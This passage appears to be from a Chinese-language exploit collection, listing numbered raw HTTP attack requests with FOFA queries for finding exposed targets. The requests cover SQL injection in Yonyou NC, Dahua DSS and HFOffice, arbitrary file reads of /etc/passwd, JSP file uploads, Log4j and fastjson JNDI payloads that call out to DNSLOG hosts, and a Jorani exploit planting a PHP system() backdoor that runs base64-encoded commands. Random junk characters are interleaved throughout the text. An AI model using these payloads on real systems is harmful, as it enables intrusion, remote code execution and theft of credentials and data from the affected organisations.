8 B7 ?8 X9 I# k" b! V4 t5 T" Q4 lGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
; b7 {1 G# r9 V) t+ j/ _Host: 127.0.0.1
& X6 {% m- G1 w$ N7 dPragma: no-cache
/ n: K) H" `+ O6 U' aCache-Control: no-cache
- B$ W( a& Y! M9 SUpgrade-Insecure-Requests: 17 G5 l2 r! W+ k* \" I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* Q( O0 e( w6 T0 } b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 j4 }* C' v2 z( ~% n, uAccept-Encoding: gzip, deflate4 n* `; J+ |& K8 V! K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ K/ T! r8 n5 L% g
Connection: close
6 o' u& K2 l8 d: W" q0 F: {+ n4 u" h. x# C4 {
# {/ D" ]! E6 ?5 w6 d& A8 T% b' Q12. Jorani < 1.0.2 远程命令执行$ u$ I" S3 E! h
FOFA:title="Jorani"
. b1 A. Q4 M/ C2 L/ q9 T第一步先拿到cookie$ F- J! L: k( R9 }2 q
GET /session/login HTTP/1.1
}" d5 S; {3 ]% PHost: 192.168.190.306 i8 I+ w) j) @. ^( r7 P
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; r* {0 J$ {0 r% {
Connection: close( W' R& e6 `$ v; u
Accept-Encoding: gzip
2 N' @& X8 Q; H5 U3 W' Q
5 v% t; K0 Z$ A5 Z0 V% l
% r& d; V* M/ v) g' |3 }6 P8 e响应中csrf_cookie_jorani用于后续请求
1 J/ J( `5 @) i: z* E, OHTTP/1.1 200 OK
$ ]2 w( p1 ^' O" [+ I$ N4 gConnection: close- ~% S' L( e7 p" o" D
Cache-Control: no-store, no-cache, must-revalidate& Y/ N. ^' o5 y* M4 p$ a6 e, }
Content-Type: text/html; charset=UTF-8$ b p4 a3 p, Z+ _6 u4 ~
Date: Tue, 24 Oct 2023 09:34:28 GMT
8 p- |% `; @% Y! x0 C% BExpires: Thu, 19 Nov 1981 08:52:00 GMT
3 T' N# M* b$ L3 \" HLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT9 t2 X/ p1 J$ B) X
Pragma: no-cache
0 ?& a2 [: z: a! C, e( @3 [. v/ sServer: Apache/2.4.54 (Debian)
# W4 |1 d/ q3 b Y* W) ^Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
4 \1 l& ]3 U7 M8 e! i& M( xSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
# G! S. f4 ]* Z8 j$ b+ m" YVary: Accept-Encoding
% v2 f3 G# r( h. F! d" \" @/ P
+ H/ u& S( m+ [: N6 M! g3 |! Z4 Q' r1 ?
POST请求,执行函数并进行base64编码2 ]( H, x- n1 A& s- Q' R7 p& W
POST /session/login HTTP/1.1
3 V1 \2 i' G' x5 a$ l' ~: ^Host: 192.168.190.30
8 r" S- j6 Z7 f- RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36! d, i- g" o& @7 P0 e
Connection: close
- } y! a! E8 iContent-Length: 252: c0 G7 O8 d8 v( T% @& R. P; P
Content-Type: application/x-www-form-urlencoded
1 k. X6 H- z* D- w& v: sCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
j+ A4 }' ?* R: _Accept-Encoding: gzip
8 h4 X7 p- u- ^6 r% [# m. o" p: C
4 J B) C- R7 S& [, K) h. Z( o/ a8 rcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
) p# e3 ]& a4 A) h0 O. t {. h. C7 ?
8 A* h3 t1 X9 K. k" i
" g; }* G: H9 |" K! X向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串# ^3 J% _/ H: ~; P R2 T5 l
GET /pages/view/log-2023-10-24 HTTP/1.1
# I$ y/ [. y! V/ E& A" ?Host: 192.168.190.30
5 l4 H! _; L/ U: ]- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 f% r4 B, G2 Q2 BConnection: close
/ n* _# [% j8 k" W5 xCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ c8 ~0 f. p' [' C( p5 T
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
) |, d0 }) y) L# h+ c) T9 VX-REQUESTED-WITH: XMLHttpRequest8 G# ]% A U" P- n7 G
Accept-Encoding: gzip
; S6 H; }5 j a0 h ~
/ d1 g3 c! h+ c; ]( n: R+ f
9 M5 \5 t0 Z' [13. 红帆iOffice ioFileDown任意文件读取! \; a) d: O$ _! i5 h% f
FOFA:app="红帆-ioffice"
5 A, o$ z/ H% O) [% mGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.15 O" P$ r/ v" J
Host: x.x.x.x2 y+ |9 J7 I6 l2 ?' l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 w8 K& r3 m& C, Y$ b2 h. d# }
Connection: close" X, t3 C8 k. Q% h
Accept: */*
1 C& X \' N" n* q( `) pAccept-Encoding: gzip
' e5 L( P- v: `8 L6 T1 Z1 c& d* X" `
" D- z3 T L) E$ T; X7 _! o
14. 华夏ERP(jshERP)敏感信息泄露# w" [2 @9 e" ?# ?
FOFA:body="jshERP-boot"8 Z* `' ]* O5 ~$ K
泄露内容包括用户名密码
7 s( O6 @. Z+ o$ ]! MGET /jshERP-boot/user/getAllList;.ico HTTP/1.1: S8 D z2 ]9 J# Z! b% ^+ w
Host: x.x.x.x! v5 G( @5 ^4 X" o5 F% I; e+ R! B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
' F! L. e! J0 V" R2 u7 \Connection: close* A$ n- J3 L/ Q1 f" p" B/ C
Accept: */*
h6 G0 s! X7 k. SAccept-Language: en6 h; K' N& J6 V% [2 B2 S! B
Accept-Encoding: gzip- k7 O2 c% N& d! n6 a
! X e& _# c7 z
* P, e8 P. k: K$ B15. 华夏ERP getAllList信息泄露5 \* T5 D- A) C. i1 H& G( I
CVE-2024-0490
+ h, m0 w; T1 n Q- [3 {3 jFOFA:body="jshERP-boot": k6 ~; h7 g' d' f
泄露内容包括用户名密码
, i- h6 a d) }! S* t/ a; bGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 y4 E, v& [( P" [' ] l; G( dHost: 192.168.40.130:1006 G# k6 N& f5 I; n& N7 c$ Y: o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- x; ] `$ a) p/ n" a+ r' K% sConnection: close* ]( P; `8 m+ j* r- h% o+ J
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
: q4 L+ A; ^9 M8 [. p x: u- {" QAccept-Language: en! Q9 E' b: ?- k% {
sec-ch-ua-platform: Windows
8 r2 P" o L* h. t. R9 W' aAccept-Encoding: gzip
2 H: Z$ \- V: U4 u" a) G3 X
$ i0 p1 A$ u) H r- x# Y5 U }7 l- d1 _8 X) t" s
16. 红帆HFOffice医微云SQL注入$ u: N6 C! ~+ g$ X
FOFA:title="HFOffice"+ A* B8 {5 P' E8 g- Y7 Y e6 D" ]
poc中调用函数计算1234的md5值
. J4 t9 E, W8 M0 Q- G. lGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1# R5 [ K7 g# [: I5 {$ F. r% T& z
Host: x.x.x.x( `' P* a- Y; j( d" L
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
- m9 e; E" x% s; R( R" HConnection: close
2 z5 p) C3 O0 q$ t1 ?1 _Accept: */*( [( i0 s1 E( `- S6 X: G: Y8 c
Accept-Language: en
; h$ a6 H. F* \Accept-Encoding: gzip" T# G: m3 B a) r# S' D7 l
6 G2 W0 v9 D; o- X ?
, @* m) H/ b2 b4 q17. 大华 DSS itcBulletin SQL 注入
6 s. u/ F) v# k( PFOFA:app="dahua-DSS"
! ]( D Y6 [3 S, [8 ~" p$ K' CPOST /portal/services/itcBulletin?wsdl HTTP/1.16 b* r) U: F4 m) \" `
Host: x.x.x.x6 o" ?3 X+ y, m( g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 K7 Y7 t! ]% m( E% g- Z2 ]5 S+ eConnection: close
: h% n/ G9 ^' U3 |( B/ _+ \5 h% n9 IContent-Length: 3452 A- d8 u7 N9 ?8 J
Accept-Encoding: gzip
5 M- _% ~. e4 K2 l" U: f
& o) C* z1 a+ V$ n<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>. L8 w* U# n& t
<s11:Body>
8 {* M& A4 X9 U) G3 \) {7 h <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ D! Y" j5 ?$ d5 J
<netMarkings>
, q1 O1 i4 Y5 h5 o0 A1 k (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=12 w2 F7 E! W$ z
</netMarkings>1 A# y/ C5 J" l3 N
</ns1:deleteBulletin>' A+ ^! P- x. x n9 V8 n
</s11:Body>
: X! j+ L& R! y3 w* y6 F</s11:Envelope>; H0 j4 b) g% q( L J
2 t+ Z/ e. W/ k! S. Z/ ], d
2 G6 x$ @5 t$ _
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ g6 M& L: w. p/ O& s" E
FOFA:app="dahua-DSS"
( @1 a! z2 G3 {% v, e# A( TGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
6 J% i5 _" P! e1 m& aHost: your-ip
( J2 o5 ~! G, Q& J SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& m# V# S _8 W. V
Accept-Encoding: gzip, deflate- r D$ {( J* F1 A, s* B c( Q
Accept: */*
. z# o& } |. c4 l$ M+ AConnection: keep-alive
% v: l9 \' g4 D! K+ a
4 h# T7 P: U' E7 q, R4 u( }, d- }
2 A. [5 R. a p+ u( L9 U19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
# x; ~+ ?8 W- E4 E# S& SFOFA:app="dahua-DSS". S' _0 C2 V1 y- q
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1 B, Y' o8 d1 s1 g" b! M! H
Host:0 q" @8 ?1 w- m4 C& O: m4 K8 V) r; f" S
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ _ W3 }0 a. F7 d; ~' b1 RAccept-Encoding: gzip, deflate( V0 @4 h: ?$ v6 n, k% L
Accept: */*
2 O/ ?3 @% q& i oConnection: keep-alive% E C5 w2 D m0 d
5 y% D/ C% Z- L/ W E- A! D( J& g: v% V7 F3 o4 G
20. 大华ICC智能物联综合管理平台任意文件读取! k2 |! b* K9 e* _
FOFA:body="*客户端会小于800*"
3 ^; v" L3 a8 U. ^2 }8 h- bGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
! v* k1 P& R1 K. B: xHost: x.x.x.x2 v9 n4 D) d0 p$ @4 v' I2 x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 G8 @) J! r4 t8 q# gConnection: close
1 P# ?# p6 v" Y: S, jAccept: */*7 b' `0 W9 z6 u, B, K* _
Accept-Language: en
. P/ b. ?, U' a, hAccept-Encoding: gzip
; |' F- }$ m5 W$ J8 G- Q* o, M3 [- ]
3 d& x( p! ~% R2 p2 K0 T3 G: w
21. 大华ICC智能物联综合管理平台random远程代码执行) t. U$ Y, S0 s5 A
FOFA:icon_hash="-1935899595"! p% F1 @) {0 b+ u
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- c V: L# V4 N' @
Host: x.x.x.x+ F3 e* e9 j# V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' k, M7 b! O; {: Q' @6 O- k/ ^! h
Content-Length: 161
6 W( H! v& r/ NAccept-Encoding: gzip
: ]: b8 j% _+ `7 eConnection: close
' d5 G& t# X5 M( J sContent-Type: application/json;charset=utf-8. |2 ^2 c. r1 A/ k& V) ^9 ]
0 e+ ]% F0 h: B7 c& O; { D# |{
D$ q3 N* P6 W- `2 \"a":{
3 I& @0 S! @6 o; A, z( P "@type":"com.alibaba.fastjson.JSONObject",3 H5 v9 m8 @4 F! h% U
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
- h! M5 l1 v, B3 C2 F. \( o }"", z' o* w/ F/ P9 U& U0 E% D/ f
} y2 ^' G- n2 O/ l
) t6 o$ g! C: p _. t
0 ]9 e' }' O u0 N22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 s7 t- X8 \0 J6 i
FOFA:icon_hash="-1935899595"
* k2 _. y6 e& z8 ~( q- ePOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.10 c0 t0 L! P' H) l6 z
Host: your-ip
6 N v8 Y0 |5 r* QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' a# Z9 ?1 w; U5 N1 \, w! PContent-Type: application/json;charset=utf-8& U( b6 K; ?5 _! R, Y# l( \
. U* ~1 \4 ?, u# d" a
{" |1 Y% ^% T- u' X' x/ z3 z
"loginName":"${jndi:ldap://dnslog}"
( f/ C" @- X: N8 q}
! |! O/ ?- N8 h+ u# o6 Q( `
+ ^" l# b( j/ I3 @8 i ^4 M7 g4 P: A/ O5 ?# ~0 L% ~% D
n7 P0 r* B7 z6 x7 `+ Q+ D( R+ L
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行9 h8 v8 V. [1 }3 R# m# y0 c
FOFA:icon_hash="-1935899595"
% G- b0 u( B3 ]7 ^# |5 E$ ~" jPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: V; s5 K" M1 O `6 K% u$ u K/ FHost: your-ip8 A* P/ r' `% r& {1 S( Z$ K# Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 W8 V1 U) ?( V- c7 E5 dContent-Type: application/json;charset=utf-8& ?8 ^+ V% u i
Accept-Encoding: gzip. M7 a0 J5 ^0 X& x3 b, a
Connection: close$ U }& }0 P, B6 [1 k7 v
8 b a3 D0 {$ L a# v
{8 o/ ^+ t3 b5 {+ v
"a":{6 R; Z; H0 M' \% E. A. k
"@type":"com.alibaba.fastjson.JSONObject",
2 {/ O, o* V& e1 z$ L: @ {"@type":"java.net.URL","val":"http://DNSLOG"}
4 O1 ~5 w7 M1 g2 X4 R& Z5 y }""
9 w5 v( D# E/ r2 V}
0 \" {; C- E" Y, r( n0 X7 y9 O# Y$ r* Z, _5 `8 T, w, \# O$ e5 T! Q0 |
' m' l, l3 C1 U# q$ k& ~2 z- }
24. 用友NC 6.5 accept.jsp任意文件上传
# W5 I- H5 {4 z! F+ G1 n8 T& hFOFA:icon_hash="1085941792"% o4 j' f5 ~; w! y% G) u. n
POST /aim/equipmap/accept.jsp HTTP/1.1
' S( E; i& L6 b$ A5 B, [Host: x.x.x.x2 ~: Z- ^6 a' H- r( t
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* ^9 z/ Y. y6 j: B7 ]Connection: close
- z( Y- ^ y3 a5 P1 F+ JContent-Length: 449
$ S' W+ v1 z, L3 wAccept: */*
; z& F/ Y0 ~2 a- Q/ SAccept-Encoding: gzip& X# m+ P5 K3 D) O! S) j
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
( A* q* P ^1 j+ ^( c' `1 n0 O; ^. R: X& v2 g
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' s* j! W2 j0 c Q2 B" }
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
5 i% h- X. v6 P/ }+ o5 oContent-Type: text/plain
# V( b% l: J7 L/ n ?) _7 U4 H. u. r2 x& g! }9 U; u
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
4 ?& y$ O- b, r' k+ C3 b* W3 l0 S-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ R& }3 W% ?9 m. D' e
Content-Disposition: form-data; name="fname"1 {# P& f" ~( z; a
: V, f* L& l. s; l( S5 ~\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp. L1 q( j) V) h% F- u$ X
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
$ `4 k1 a$ b" A. o
( ]2 u% c1 s; A+ z4 k- L& X- u: |9 s- Q
25. 用友NC registerServlet JNDI 远程代码执行
6 N1 D- V- Q+ n5 w! L' nFOFA:app="用友-UFIDA-NC", r6 m9 p1 @" X4 R, {+ b0 c
POST /portal/registerServlet HTTP/1.1
% v$ F6 {7 K! D/ ~Host: your-ip
2 _8 E0 }4 c2 f: p4 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ C3 |/ r. }" t* @5 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 s# I0 B- [: h6 Q4 l, xAccept-Encoding: gzip, deflate+ f6 G8 t2 N1 t5 v# x3 w; v
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.67 ~" G" [0 w3 q" N6 M- |. ~
Content-Type: application/x-www-form-urlencoded
) c O( U" ?! u9 _1 r- |: S: m4 H1 d
' I! z# Z: g4 W+ M2 {7 ?0 @! o* otype=1&dsname=ldap://dnslog
1 b! A4 ]3 O5 h: G& [( y* ]8 J$ E; x4 V
- X9 `0 J2 k: q8 X/ m, n6 [2 ^5 t6 j, B5 X. S' h
26. 用友NC linkVoucher SQL注入6 p- G0 m! Z4 ~! b$ \+ A ^- U+ L
FOFA:app="用友-UFIDA-NC"/ ^0 b6 K7 S+ ^, e3 D
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.10 ]' n7 P" Z4 J5 f' P% ?
Host: your-ip
6 Y3 G8 `, D8 u1 L8 R7 G) s& |: i. ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 `) t6 u1 i$ }: @* Z- Y7 r E
Content-Type: application/x-www-form-urlencoded
# f/ r" T! U7 z- {$ O- A. nAccept-Encoding: gzip, deflate5 [8 s' k" L m+ r9 [' [
Accept: */*
0 x, ^8 q5 B' x) N5 z2 n+ }Connection: keep-alive
6 B8 t: O6 C2 A0 g. |3 ]$ Y% X7 S1 U% J& L0 H( n
0 ~5 t6 o+ d# V3 m) e27. 用友 NC showcontent SQL注入
& G! p X1 H+ P+ uFOFA:icon_hash="1085941792"
9 x, x; G9 x s" k7 e# X! Z9 |GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 V3 J8 O7 F& h" D. i
Host: your-ip
$ ~# V! n; M/ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. V. K- j% @, k, cAccept-Encoding: identity
; n: J$ R, I, H1 C2 X! } b" {Connection: close
6 {* N. r' q" ^1 ~Content-Type: text/xml; charset=utf-84 S7 P z4 q' O0 ^" V/ L
6 W! f6 K: m0 f
- U2 [1 f' l; G* c# K# _2 x. |" P28. 用友NC grouptemplet 任意文件上传5 w3 }6 v8 W, y7 [) [. F F
FOFA:icon_hash="1085941792"" c" Y: U' j. T
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
( h4 V+ G8 K" u" H2 C) B( iHost: x.x.x.x# c' P; w c4 ]7 a5 ]1 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36+ r T) \/ ?; B. x$ T
Connection: close3 m. r' ~ A L" H
Content-Length: 268+ y) o* l7 m4 v3 l9 m4 k
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
$ ?5 L8 {( h9 t" r' v& HAccept-Encoding: gzip' F! D2 i& j6 _! `+ a \/ S1 p8 n- P' p
0 ^2 J' C: K- o8 J
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
$ G: O- z7 \# [$ i$ I8 \Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp": t2 Q, M2 R8 _: M
Content-Type: application/octet-stream9 L- k0 Z6 p t0 {
8 f, _# X- I+ c; o
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>( o0 q8 ^5 v1 A& g7 U
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--2 p# Z: q4 }3 C" Q2 V/ @; M
, Q" t5 g2 I4 k% V
7 n/ T: c, A- M# \7 p
/uapim/static/pages/nc/head.jsp
3 a. S% G, h8 f: U# z& y# R9 R) a
29. 用友NC down/bill SQL注入
5 |7 m( A$ R* mFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& e. I6 ?* \) V9 ~) QGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.16 j4 q6 P+ l) H% X4 K
Host: your-ip
0 o! H- t5 y7 ?( n, H9 r* aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ W m0 K0 O UContent-Type: application/x-www-form-urlencoded5 c' }6 D7 m5 A8 B. v" h/ u4 C( m
Accept-Encoding: gzip, deflate
. A, i5 v2 F$ RAccept: */*
- o6 y# M- \% e! W. T2 dConnection: keep-alive
9 W0 `7 t. G) c6 b2 K5 m0 X- G$ h, C9 `, ?& u/ E1 q( e5 }
( E% T5 |5 V; @30. 用友NC importPml SQL注入9 b' o$ J1 y% U, ~) v2 o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 M. W% B: z9 o% I& }/ v1 n1 Z. G
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1* @3 o7 x5 D) a
Host: your-ip- R4 k! f* s+ k# O& j" L' g& C9 }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V+ G4 W3 o" \4 V# y" ~3 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36% G3 r8 H3 K2 a* P& A0 P* k" r- q
Connection: close: G( q( w" U n7 f3 a1 _/ h
5 L( K" N) p- G9 C# k) X
------WebKitFormBoundaryH970hbttBhoCyj9V
1 U; `: K# V: kContent-Disposition: form-data; name="Filedata"; filename="1.jpg"$ `9 U/ b R" M0 l! Y
Content-Type: image/jpeg
( Z6 `4 S. i( w K------WebKitFormBoundaryH970hbttBhoCyj9V--
; h3 |. i" A5 y+ p3 {: v' ^* v4 Z, K) j* s$ G( G3 Q# j: i' o# S
" E0 y% n% L0 F+ x31. 用友NC runStateServlet SQL注入# i& D# M, `+ U, d H8 O6 \+ Q) F
version<=6.5
& C5 o: `* s% TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% d4 @2 c% Z. _3 g- ^GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ V$ n. \, n: I8 {/ eHost: host
7 m* V0 Q2 W% p( V8 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* S- s3 v/ w, }" i
Content-Type: application/x-www-form-urlencoded( k& _6 U+ G- o9 [) x/ \
1 _% w/ v$ k b/ D
- n H% D7 t/ k
32. 用友NC complainbilldetail SQL注入 u0 U4 U) Z. C# ]9 q( N
version= NC633、NC658 p/ u7 z' B9 h {) I2 `0 F
FOFA:app="用友-UFIDA-NC"* W3 b2 [4 ?8 g0 k$ l& t
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1& l, F7 d/ q9 K/ T2 T. \6 d% q8 P
Host: your-ip
7 v {$ F6 y8 b( J9 a5 H3 b6 h) AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ d/ k2 }% f9 h0 T' ZContent-Type: application/x-www-form-urlencoded
9 T+ [1 H$ w8 Z$ J2 K6 AAccept-Encoding: gzip, deflate
, ]+ y' u0 n, f' i3 W) }Accept: */*; Z7 n. n% f. k) s. @, Z8 V
Connection: keep-alive
! ]) E1 g) X7 S0 [/ ^+ h# T- f b0 T7 i( A" d- V) x/ V
1 r+ ?6 B: D$ ~% ]
33. 用友NC downTax/download SQL注入
4 R( [- }( Y/ n& _2 p9 C- Fversion:NC6.5FOFA:app="用友-UFIDA-NC"; P# e% v! W( ?* G. R
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 @% p/ d& \* A. I( n/ J: U2 tHost: your-ip
; z* z+ C4 J0 W( }" ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. Z5 h+ p! S7 x
Content-Type: application/x-www-form-urlencoded5 n! O$ g$ S' B( A# t
Accept-Encoding: gzip, deflate `% \% l( U' d; j6 a8 p/ a p9 M* u& M
Accept: */*" [" p- ^' b* z9 E. Y1 Z# h) C
Connection: keep-alive
7 O( a: G1 B& Q2 }; d D3 l! P5 d8 z/ r
' r D3 \; ?8 F& _) N q `
34. 用友NC warningDetailInfo接口SQL注入8 P$ {" C1 l$ m* ?2 i7 O. Y8 w
FOFA:app="用友-UFIDA-NC"
! g4 Q! d+ z% Y) W% s. x) KGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 t& o0 D. A+ hHost: your-ip
) K" Q6 F. S7 E' I6 X+ V5 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ H9 Y; Q! L/ k0 t1 S
Content-Type: application/x-www-form-urlencoded! X( z' y( X- q8 s' O
Accept-Encoding: gzip, deflate
I6 a" Z8 C- K* G1 H5 |( `Accept: */*& ?+ _# i- `) y. P. s+ P+ i
Connection: keep-alive; x/ e( w1 ]5 P5 N8 e; l! `# B
( W0 O ^' ~3 @3 [: [5 }
& `3 W$ O6 @- ^35. 用友NC-Cloud importhttpscer任意文件上传
2 ^9 A. W6 a! \! t" s* tFOFA:app="用友-NC-Cloud"
' x$ v6 Y- A. U3 hPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.16 p8 t, ?& C) L+ K$ h- a
